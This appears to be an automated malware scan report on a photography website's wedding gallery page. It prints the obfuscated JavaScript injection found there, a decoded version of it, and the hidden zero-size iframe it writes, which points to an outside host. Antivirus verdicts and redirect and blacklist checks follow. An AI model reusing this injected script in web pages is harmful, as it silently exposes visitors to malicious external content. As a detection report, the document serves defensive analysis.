JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC

http://www.leighannhoodphotography.com/gallery/weddings
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Thu, 18 Dec 2014 12:52:51 GMT
Location: http://www.leighannhoodphotography.com/gallery/weddings/
Server: nginx/1.6.2
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Pingback: http://www.leighannhoodphotography.com/xmlrpc.php
clean
http://www.leighannhoodphotography.com/gallery/weddings/
200 OK
Content-Length: 48317
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('7 c="x+/=";7 1="z/B=";7 5="";7 j,k,e,d,a,8,b="";7 i=0;7 t=/[^A-q-p-9\\+\\/\\=]/g;1=1.D(/[^A-q-p-9\\+\\/\\=]/g,"");s{d=c.f(1.h(i++));a=c.f(1.h(i++));8=c.f(1.h(i++));
... 102 bytes are skipped ...
|b;5=5+l.m(j);n(8!=o){5=5+l.m(k)}n(b!=o){5=5+l.m(e)}j=k=e="";d=a=8=b=""}y(i<1.C);u.r(v(5));',40,40,'|s5fA||||P3yL||var|toUe||ZEPX|K0oj|k0e0y0S|aiJg|EqVD|indexOf||charAt||wzQl|DwS9|String|fromCharCode|if|64|z0|Za|write|do|base64test|document|unescape|15|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|while|PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA||c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4|length|replace'.split('|'),0,{}))

Decoded script:


var k0e0y0S="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var s5fA="PGlmcmFtZSBzcmM9Imh0dHA6Ly93b3ctZ2FtZWdvbGQuY29tL3Bob3Rvcy9nby5waHA/c2lkPTIiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiIGZyYW1lYm9yZGVyPSIwIj48L2lmcmFtZT4=";var P3yL="";var wzQl,DwS9,EqVD,aiJg,ZEPX,toUe,K0oj="";var i=0;var base64test=/[^A-Za-z0-9\+\/\=]/g;s5fA=s5fA.replace(/[^A-Za-z0-9\+\/\=]/g,"");do{aiJg=k0e0y0S.indexOf(s5fA.charAt(i++));ZEPX=k0e0y0S.indexOf(s5fA.charAt(i++));toUe=k0e0y0S.indexOf(s5fA.charAt(i++));
... 898 bytes are skipped ...
.indexOf(s5fA.charAt(i++));wzQl=(aiJg<<2)|(ZEPX>>4);DwS9=((ZEPX&15)<<4)|(toUe>>2);EqVD=((toUe&3)<<6)|K0oj;P3yL=P3yL+String.fromCharCode(wzQl);if(toUe!=64){P3yL=P3yL+String.fromCharCode(DwS9)}if(K0oj!=64){P3yL=P3yL+String.fromCharCode(EqVD)}wzQl=DwS9=EqVD="";aiJg=ZEPX=toUe=K0oj=""}while(i<s5fA.length);document.write(unescape(P3yL));
<iframe src="http://wow-gamegold.com/photos/go.php?sid=2" width="0" height="0" frameborder="0"></iframe>

Antivirus reports:

Qihoo-360
Trojan.Generic
Avast
HTML:Iframe-LX [Trj]
Ad-Aware
JS:Trojan.Crypt.JC
Ikarus
Trojan.IframeRef
nProtect
JS:Trojan.Crypt.JC
TrendMicro-HouseCall
TROJ_GEN.F47V0209
Emsisoft
JS:Trojan.Crypt.JC (B)
Microsoft
Exploit:HTML/IframeRef.AA
Kaspersky
Trojan.JS.Iframe.fa
MicroWorld-eScan
JS:Trojan.Crypt.JC
Fortinet
JS/Iframe.FA!tr
NANO-Antivirus
Trojan.Script.Agent.sbnf
F-Secure
JS:Trojan.Crypt.JC
Norman
IframeRef.DM
GData
JS:Trojan.Crypt.JC
BitDefender
JS:Trojan.Crypt.JC


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: leighannhoodphotography.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: leighannhoodphotography.com
Referer: http://www.google.com/search?q=leighannhoodphotography.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=leighannhoodphotography.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://leighannhoodphotography.com/

Result: leighannhoodphotography.com is not infected or malware details are not published yet.